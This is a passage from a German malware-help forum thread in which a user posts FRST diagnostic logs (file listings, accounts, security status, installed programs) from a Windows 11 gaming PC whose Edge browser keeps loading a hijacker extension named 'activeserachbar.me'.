2022-06-18 21:41 - 2022-04-09 12:49 - 000000000 ____D C:\Users\Pauli\AppData\Local\CrashDumps 2022-06-18 16:39 - 2022-04-08 21:43 - 000002169 _____ C:\Users\Pauli\Desktop\WeMod.lnk 2022-06-18 16:39 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WeMod 2022-06-18 16:39 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Local\WeMod 2022-06-18 16:38 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Local\SquirrelTemp 2022-06-17 14:23 - 2022-04-29 20:04 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\LGHUB 2022-06-17 14:10 - 2022-04-29 20:04 - 000000000 ____D C:\Users\Pauli\AppData\Local\LGHUB 2022-06-17 14:04 - 2022-04-08 19:34 - 000000000 ____D C:\Windows\system32\MRT 2022-06-17 14:03 - 2022-04-08 19:34 - 145918784 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2022-06-17 14:01 - 2022-04-08 19:22 - 003101184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll 2022-06-15 13:48 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\SecurityHealth 2022-06-13 16:25 - 2022-04-30 13:17 - 000000000 ____D C:\Users\Pauli\Documents\My Games 2022-06-12 18:13 - 2022-04-08 19:19 - 000002628 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2022-06-12 18:13 - 2022-04-08 19:19 - 000002460 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2022-06-12 18:11 - 2022-05-13 19:14 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Setup 2022-06-12 14:41 - 2022-05-13 20:23 - 000000000 ____D C:\Program Files\LGHUB.d47858fb-ee82-4f88-8d4f-f004e34df74b 2022-06-11 20:24 - 2022-04-08 19:32 - 000000000 ____D C:\ProgramData\Package Cache 2022-06-11 19:57 - 2022-04-15 19:31 - 000000000 ____D C:\Program Files (x86)\Origin 2022-06-11 19:57 - 2022-04-09 14:33 - 000000000 ____D C:\ProgramData\Origin 2022-06-10 14:58 - 2022-04-08 22:50 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\.minecraft 2022-06-10 12:48 - 2022-04-09 17:44 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\paradox-launcher-v2 2022-06-09 18:57 - 2022-04-08 20:41 - 002762208 _____ (Microsoft Corporation) C:\Windows\system32\xgameruntime.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000402920 _____ (Microsoft Corporation) C:\Windows\system32\gameplatformservices.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000230864 _____ (Microsoft Corporation) C:\Windows\system32\gamingservicesproxy.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000198112 _____ (Microsoft Corporation) C:\Windows\system32\gameconfighelper.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000136672 _____ (Microsoft Corporation) C:\Windows\system32\gamelaunchhelper.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000131072 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcuihelpers.dll 2022-06-09 18:57 - 2022-04-08 20:41 - 000062928 _____ (Microsoft Corporation) C:\Windows\system32\gamemodcontrol.exe 2022-06-07 14:23 - 2022-04-13 20:51 - 000008698 _____ C:\Users\Pauli\Documents\HudSight.txt 2022-06-06 20:49 - 2022-04-08 20:49 - 000000000 ____D C:\Program Files (x86)\Salfeld 2022-06-06 17:59 - 2022-04-08 19:27 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2022-06-05 15:34 - 2022-04-14 16:00 - 000000000 ____D C:\Users\Pauli\AppData\Local\EpicGamesLauncher 2022-06-05 15:22 - 2022-04-11 21:20 - 001431256 _____ (Wellbia.com Co., Ltd.) C:\Windows\xhunter1.sys 2022-06-02 19:32 - 2022-04-15 19:31 - 000000000 ____D C:\ProgramData\Electronic Arts 2022-06-02 19:31 - 2022-04-09 13:01 - 000000000 ____D C:\Program Files\EA Games 2022-06-02 17:35 - 2022-04-09 23:13 - 000000000 ____D C:\ProgramData\TruckersMP 2022-06-02 12:47 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\NDF 2022-06-01 20:51 - 2022-04-08 19:32 - 000000000 ____D C:\Users\Pauli\AppData\Local\PlaceholderTileLogoFolder 2022-05-31 18:25 - 2021-06-05 14:10 - 000000000 ___HD C:\Windows\ELAMBKUP 2022-05-31 18:11 - 2021-06-05 14:10 - 000000000 ___HD C:\Windows\system32\GroupPolicy 2022-05-30 17:01 - 2022-04-09 13:03 - 000000000 ____D C:\Users\Pauli\AppData\Local\UnrealEngine 2022-05-29 17:04 - 2022-04-08 19:33 - 000000000 ____D C:\Users\Pauli\AppData\Local\NVIDIA 2022-05-29 17:02 - 2022-04-08 19:45 - 000004308 _____ C:\Windows\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003976 _____ C:\Windows\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003940 _____ C:\Windows\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003894 _____ C:\Windows\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000003654 _____ C:\Windows\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2022-05-29 17:02 - 2022-04-08 19:45 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2022-05-29 17:02 - 2022-04-08 19:27 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2022-05-23 20:58 - 2022-04-17 12:34 - 000000217 _____ C:\Users\Pauli\Desktop\Flashing Lights - Polizei, Feuerwehr, Rettungsdienst-Simulator.url 2022-05-21 05:22 - 2022-04-08 19:49 - 000724688 _____ (NVIDIA Corporation) C:\Windows\system32\nvml.dll 2022-05-21 05:18 - 2022-04-08 19:27 - 007618584 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll 2022-05-21 05:18 - 2022-04-08 19:27 - 006465200 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======== 2022-05-15 20:48 - 2022-05-15 20:48 - 000004846 _____ () C:\Users\Pauli\AppData\Local\1355515445 2022-05-29 17:52 - 2022-05-29 17:52 - 000004350 _____ () C:\Users\Pauli\AppData\Local\2613946761 2022-05-15 20:52 - 2022-05-15 20:52 - 000004846 _____ () C:\Users\Pauli\AppData\Local\3390820382 2022-05-07 16:50 - 2022-05-07 16:50 - 000005190 _____ () C:\Users\Pauli\AppData\Local\4096968421 ==================== SigCheck ============================ (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) ==================== Ende von FRST.txt ======================== |
20.06.2022, 10:02 | #2 |
| Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Addition Log:
__________________Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 19-06-2022 durchgeführt von Pauli (20-06-2022 09:41:59) Gestartet von C:\Users\Pauli\Desktop Microsoft Windows 11 Pro Version 21H2 22000.739 (X64) (2022-04-08 17:20:31) Start-Modus: Normal ========================================================== ==================== Konten: ============================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) Administrator (S-1-5-21-1424437550-2087844553-323541659-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-1424437550-2087844553-323541659-503 - Limited - Disabled) Gast (S-1-5-21-1424437550-2087844553-323541659-501 - Limited - Disabled) Pauli (S-1-5-21-1424437550-2087844553-323541659-1001 - Administrator - Enabled) => C:\Users\Pauli WDAGUtilityAccount (S-1-5-21-1424437550-2087844553-323541659-504 - Limited - Disabled) ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: Spybot - Search and Destroy (Disabled - Out of date) {F77C7796-45C4-531E-0DAE-B4A8229B11C8} AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 7-Zip 21.07 (x64) (HKLM\...\7-Zip) (Version: 21.07 - Igor Pavlov) ARMOURY CRATE Lite Service (HKLM\...\{EF3944FF-2501-4568-B15C-5701E726719E}) (Version: 5.1.4 - ASUS) ASUS AIOFan HAL (HKLM\...\{EAE80DED-1A39-41C5-9F60-87CC947F6454}) (Version: 1.1.45.0 - ASUSTek COMPUTER INC.) Hidden ASUS AIOFan HAL (HKLM-x32\...\{e040e3dd-d66c-4bca-bc40-f9eac8080fee}) (Version: 1.1.45.0 - ASUSTek COMPUTER INC.) Hidden ASUS AURA Extension Card HAL (HKLM\...\{237E1CAC-1708-4940-AC34-DF15C079AB70}) (Version: 1.1.0.18 - ASUSTeK COMPUTER INC.) Hidden ASUS AURA Extension Card HAL (HKLM-x32\...\{4e2b05b0-eb08-41e5-9eb3-cdcc43d6bee0}) (Version: 1.1.0.18 - ASUSTeK COMPUTER INC.) Hidden ASUS AURA Motherboard HAL (HKLM\...\{4EBEAC95-76BC-46A8-8644-6E2F1C87CF70}) (Version: 1.2.8.0 - ASUSTeK COMPUTER INC.) Hidden ASUS AURA Motherboard HAL (HKLM-x32\...\{c289ca16-807e-4373-92c3-29ef5dc2119a}) (Version: 1.2.8.0 - ASUSTeK COMPUTER INC.) Hidden ASUS Aura SDK (HKLM\...\{CF8E6E00-9C03-4440-81C0-21FACB921A6B}) (Version: 3.04.11 - ASUSTek COMPUTER INC.) Hidden ASUS AURA VGA Component (HKLM\...\{71BB96A6-EAC4-45AE-A17D-D3ED43FF1D14}) (Version: 0.0.4.8 - ASUSTek COMPUTER INC. ) Hidden ASUS AURA VGA Component (HKLM-x32\...\{7c01c465-34a9-4e0e-85c1-e54a7c919571}) (Version: 0.0.4.8 - ASUSTek COMPUTER INC. ) Hidden ASUS Framework Service (HKLM-x32\...\{8bc53c84-d9aa-4cc6-b19c-261f445494dc}) (Version: 2.1.3.0 - ASUSTek COMPUTER INC.) ASUS Framework Service (HKLM-x32\...\{EA6A87BE-8AD3-40D2-944C-9DF5FBFF4332}) (Version: 2.1.3.0 - ASUSTek COMPUTER INC.) Hidden ASUS Motherboard (HKLM-x32\...\{93795eb8-bd86-4d4d-ab27-ff80f9467b37}) (Version: 3.00.10 - ASUSTek Computer Inc.) ASUS Mouse HAL (HKLM\...\{B8F984F2-7887-4DD2-8D96-F9A4BC5A4AC5}) (Version: 1.2.0.33 - ASUSTek COMPUTER INC.) Hidden ASUS Mouse HAL (HKLM-x32\...\{6cd7e9ad-20e2-48e3-a884-bae1e16d1868}) (Version: 1.2.0.33 - ASUSTek COMPUTER INC.) Hidden ASUS Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.107.79 - ASUSTeK Computer Inc.) Hidden AURA DRAM Component (HKLM\...\{9AFE5429-866B-457D-A864-80BCF7672EE8}) (Version: 1.1.18 - ASUS) Hidden AURA DRAM Component (HKLM-x32\...\{c3ae9104-ed9b-4ab5-9eb1-569697f4514b}) (Version: 1.1.18 - ASUS) Hidden AURA lighting effect add-on (HKLM-x32\...\{1E2EA04B-FCA7-457E-B6F4-F33E1858E859}) (Version: 0.0.21 - ASUS) AURA lighting effect add-on x64 (HKLM\...\{C5A4A164-4428-4931-B728-96EEF0FA3C44}) (Version: 0.0.21 - ASUS) AURA Service (HKLM-x32\...\{0E536061-3B55-4D45-BF58-0BDA261C94B0}) (Version: 3.05.40 - ASUSTeK Computer Inc.) Hidden AURA Service (HKLM-x32\...\{a1318319-c95b-48da-beb8-63ed6e4d809a}) (Version: 3.05.40 - ASUSTeK Computer Inc.) CORSAIR iCUE 4 Software (HKLM\...\{D73161EC-0B74-45DE-9908-6B2B583DFDA5}) (Version: 4.22.203 - Corsair) CPUID ASUS CPU-Z 1.97 (HKLM\...\CPUID ASUS CPU-Z_is1) (Version: 1.97 - CPUID, Inc.) Discord (HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Discord) (Version: 1.0.9004 - Discord Inc.) Dynamic Application Loader Host Interface Service (HKLM\...\{3FD9F3E6-059D-4E4D-8B5B-EBAE90CA882E}) (Version: 1.0.0.0 - Intel Corporation) Hidden EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.220.5191 - Electronic Arts) Hidden EA app (HKLM-x32\...\{7e128ed4-7e5b-480d-aeb3-0e178dd9d723}) (Version: 12.0.220.5191 - Electronic Arts) ENE RGB HAL (HKLM\...\{E050E98C-5524-4AFB-9E53-97700BEF2C02}) (Version: 1.1.39.15 - Ene Tech.) Hidden ENE RGB HAL (HKLM-x32\...\{135617a1-0191-4ed9-a0f7-2786a4739018}) (Version: 1.1.39.15 - Ene Tech.) Hidden ENE_EHD_M2_HAL (HKLM\...\{37A48B7F-D4EA-4863-844E-A284E2AA3C5D}) (Version: 1.0.9.12 - ENE TECHNOLOGY INC.) Hidden ENE_EHD_M2_HAL (HKLM-x32\...\{97f3a665-a91b-4def-91e2-97fec9f22bfa}) (Version: 1.0.9.12 - ENE TECHNOLOGY INC.) Hidden Epic Games Launcher (HKLM-x32\...\{5F15891E-8342-47CD-AFFF-89211CFC04D0}) (Version: 1.3.23.0 - Epic Games, Inc.) Epic Online Services (HKLM-x32\...\{758842D2-1538-4008-A8E3-66F65A061C52}) (Version: 2.0.33.0 - Epic Games, Inc.) Farmers Dynasty (HKLM-x32\...\{A87FBF41-2485-4161-9CAB-F97EC1C18E61}) (Version: 1.05.0.0 - TOPLITZ PRODUCTIONS) FIFA 22 (HKLM-x32\...\{67F7ABF6-2557-4756-923A-AB99086B1490}) (Version: 1.0.75.5367 - Electronic Arts) GameSDK Service (HKLM-x32\...\{1a192f34-128f-43ed-a83d-f998b9d5f646}) (Version: 1.0.0.4 - ASUSTek COMPUTER INC.) GameSDK Service (HKLM-x32\...\{7160DA8D-3F25-4F6E-ABC8-F693551D82FA}) (Version: 1.0.0.4 - ASUSTek COMPUTER INC.) Hidden Grand Theft Auto V (HKLM-x32\...\{5EFC6C07-6B87-43FC-9524-F9E967241741}) (Version: 1.0.2628.2 - Rockstar Games) HudSight (HKLM-x32\...\HudSight_is1) (Version: 1 - ) Intel(R) Chipset Device Software (HKLM\...\{2EE411D3-03C6-4647-81F5-A3C13F25FDC5}) (Version: 10.1.18838.8284 - Intel Corporation) Hidden Intel(R) Chipset Device Software (HKLM-x32\...\{2d8d3782-0c02-4681-87f4-e004b3d4a8f6}) (Version: 10.1.18838.8284 - Intel(R) Corporation) Intel(R) LMS (HKLM\...\{B76FE067-1B6B-416E-9A99-C1BF5E9A2FC1}) (Version: 1.0.0.0 - Intel Corporation) Hidden Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 2149.16.0.2602 - Intel Corporation) Intel(R) Management Engine Components (HKLM\...\{3EE91568-6FE3-43AA-9BFC-7496A56D272C}) (Version: 1.0.0.0 - Intel Corporation) Hidden Intel(R) Management Engine Driver (HKLM\...\{E4924222-0A39-4EEE-8F7E-8C95BDFDCFCE}) (Version: 1.0.0.0 - Intel Corporation) Hidden Intel(R) Serial IO (HKLM\...\{8EC4CB19-850D-4BD4-B914-F63DF7DAD67D}) (Version: 30.100.2131.26 - Intel Corporation) Hidden Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.2131.26 - Intel Corporation) Kindersicherung (HKLM-x32\...\Salfeld-Kindersicherung_is1) (Version: - ) Kingston AURA DRAM Component (HKLM\...\{965CDF5F-901C-476F-B3A8-7396701B1129}) (Version: 1.1.12 - KINGSTON COMPONENTS INC.) Hidden Kingston AURA DRAM Component (HKLM-x32\...\{2237a879-7fa4-4e21-ae3b-00f6a649b9d9}) (Version: 1.1.12 - KINGSTON COMPONENTS INC.) Hidden Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden Logitech G HUB (HKLM\...\{521c89be-637f-4274-a840-baaf7460c2b2}) (Version: 2022.6.271036 - Logitech) Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\OneDriveSetup.exe) (Version: 22.111.0522.0002 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{6A2A8076-135F-4F55-BB02-DED67C8C6934}) (Version: 4.67.0.0 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation) Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (HKLM\...\{929FBD26-9020-399B-9A7A-751D61F0B942}) (Version: 12.0.21005 - Microsoft Corporation) Hidden Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (HKLM\...\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}) (Version: 12.0.21005 - Microsoft Corporation) Hidden Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29913 (HKLM-x32\...\{855e31d2-9031-46e1-b06d-c9d7777deefb}) (Version: 14.28.29913.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation) Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29913 (HKLM\...\{620A7633-7A09-42A8-8580-076A4483C4B0}) (Version: 14.28.29913 - Microsoft Corporation) Hidden Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29913 (HKLM\...\{EECDD137-13DA-46ED-ADA0-BDF7F8BE65B8}) (Version: 14.28.29913 - Microsoft Corporation) Hidden Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation) NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation) NVIDIA Grafiktreiber 512.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.95 - NVIDIA Corporation) NVIDIA HD-Audiotreiber 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation) NVIDIA PhysX (HKLM-x32\...\{3F5C371F-8EA2-4F25-9D3D-D0B4526E3AEA}) (Version: 9.10.0513 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.) Paradox Launcher v2 (HKLM\...\{66DA3501-823A-4F07-A20D-C64495A59DC8}) (Version: 2.1.0 - Paradox Interactive) Patriot Viper DRAM RGB (HKLM\...\{1F9C282E-CCB4-4D8E-A5CB-7B74DFCD8C95}) (Version: 1.0.9.2 - Patriot Memory) Hidden Patriot Viper DRAM RGB (HKLM-x32\...\{fdc098ce-d76c-4e2e-a0a6-01a24e9a1f7d}) (Version: 1.0.9.2 - Patriot Memory) Patriot Viper M2 SSD RGB (HKLM\...\{8B4C0A3D-C135-4E1F-98D8-3926494B4D61}) (Version: 1.0.6.5 - Patriot Memory) Hidden Patriot Viper M2 SSD RGB (HKLM-x32\...\{387596e5-692e-4baf-bec2-3338d555df7a}) (Version: 1.0.6.5 - Patriot Memory) Pflanzen gegen Zombies™ (HKLM-x32\...\{5E6536C2-E79A-49CF-83EA-817AD81F9FC8}) (Version: 1.2.0.1093 - Electronic Arts, Inc.) PHISON HAL (HKLM\...\{966E33F0-6786-4B38-AA29-C1B3F6C1955D}) (Version: 1.0.9.0 - PHISON Electronics Corp.) Hidden PHISON HAL (HKLM-x32\...\{549da357-1b81-456b-83f2-dcc47c41dfff}) (Version: 1.0.9.0 - PHISON Electronics Corp.) Hidden PVZ Garden Warfare (HKLM-x32\...\{A5AC7D7B-C1D5-4AF9-8829-993DA335BE1B}) (Version: 1.0.3.0 - Electronic Arts) Realtek Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.9254.1 - Realtek Semiconductor Corp.) Roblox Player for Pauli (HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\roblox-player) (Version: - Roblox Corporation) Rockstar Games Launcher (HKLM-x32\...\Rockstar Games Launcher) (Version: 1.0.59.842 - Rockstar Games) Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 2.1.3.7 - Rockstar Games) ROG FAN XPERT 4 (HKLM-x32\...\{2dfe216d-3481-4684-ad4d-2566bd7cfe4f}) (Version: 2.00.03 - ASUSTek Computer Inc.) ROG Live Service (HKLM-x32\...\{2D87BFB6-C184-4A59-9BBE-3E20CE797631}) (Version: 1.4.5.0 - ASUSTek COMPUTER INC.) Setup 1.0.0 (HKLM\...\eb1a0fbb-fc70-428e-97f1-fa7080894806) (Version: 1.0.0 - ) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TruckersMP Launcher 1.0.0.4 (HKLM\...\{A227B892-C548-4490-9C5D-DB341F8194A6}_is1) (Version: 1.0.0.4 - TruckersMP Team) TUF GAMING M3 (HKLM-x32\...\{89cc6449-58a5-4aae-b59f-f96ffd1ec35f}) (Version: 3.00.18 - ASUSTek Computer Inc.) Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 130.1.10657 - Ubisoft) UE4 Prerequisites (x64) (HKLM\...\{D7B591D8-1091-4A00-A0B3-5301C45E5D51}) (Version: 1.0.14.0 - Epic Games, Inc.) Hidden UE4 Prerequisites (x64) (HKLM-x32\...\{0d995f46-317b-4b5f-bf3e-9f98bae9d339}) (Version: 1.0.14.0 - Epic Games, Inc.) Hidden Universal Holtek RGB DRAM (HKLM\...\{826388E4-E31F-4514-948B-3BB954FB3EAF}) (Version: 1.0.0.2 - PD) Hidden Universal Holtek RGB DRAM (HKLM-x32\...\{6870588f-9f28-488b-a169-cf548ad6b393}) (Version: 1.0.0.2 - PD) VGA (HKLM-x32\...\{0f87ebb7-aabb-43e5-9c5d-28744f517468}) (Version: 2.11.03 - ASUSTek Computer Inc.) WD_BLACK AN1500 (HKLM\...\{085E2365-0A70-4230-B664-02D5E4FE7E9C}) (Version: 1.0.14.0 - ENE TECHNOLOGY INC.) Hidden WD_BLACK AN1500 (HKLM-x32\...\{e42c5874-37b0-4977-9e8d-70bf006e1f76}) (Version: 1.0.14.0 - ENE TECHNOLOGY INC.) Hidden WeMod (HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\WeMod) (Version: 8.2.0 - WeMod) Packages: ========= ARMOURY CRATE -> C:\Program Files\WindowsApps\B9ECED6F.ArmouryCrate_5.1.5.0_x64__qmba6cd70vzyy [2022-04-08] (ASUSTeK COMPUTER INC.) Clustertruck -> C:\Program Files\WindowsApps\tinyBuildGames.3289435C1E20_1.0.3.0_x86__3sz1pp2ynv2xe [2022-06-16] (tinyBuild Games) Disney+ -> C:\Program Files\WindowsApps\Disney.37853FC22B2CE_1.30.4.0_x64__6rarf9sa4v8jt [2022-06-09] (Disney) DTS Audio Processing -> C:\Program Files\WindowsApps\DTSInc.DTSAudioProcessing_1.10.7.0_x64__t5j2fzbtdg37r [2022-05-06] (DTS, Inc.) Forza Horizon 5 -> C:\Program Files\WindowsApps\Microsoft.624F8B84B80_3.455.709.0_x64__8wekyb3d8bbwe [2022-04-27] (Microsoft Studios) Intel® Grafik-Kontrollraum -> C:\Program Files\WindowsApps\AppUp.IntelGraphicsExperience_1.100.3408.0_x64__8j3eq9eme6ctt [2022-05-20] (INTEL CORP) [Startup Task] Intel® Optane™ Memory and Storage Management -> C:\Program Files\WindowsApps\AppUp.IntelOptaneMemoryandStorageManagement_19.0.1026.0_x64__8j3eq9eme6ctt [2022-04-23] (INTEL CORP) Lively Wallpaper -> C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy [2022-05-31] (rocksdanister) [Startup Task] Microsoft Flight Simulator -> C:\Program 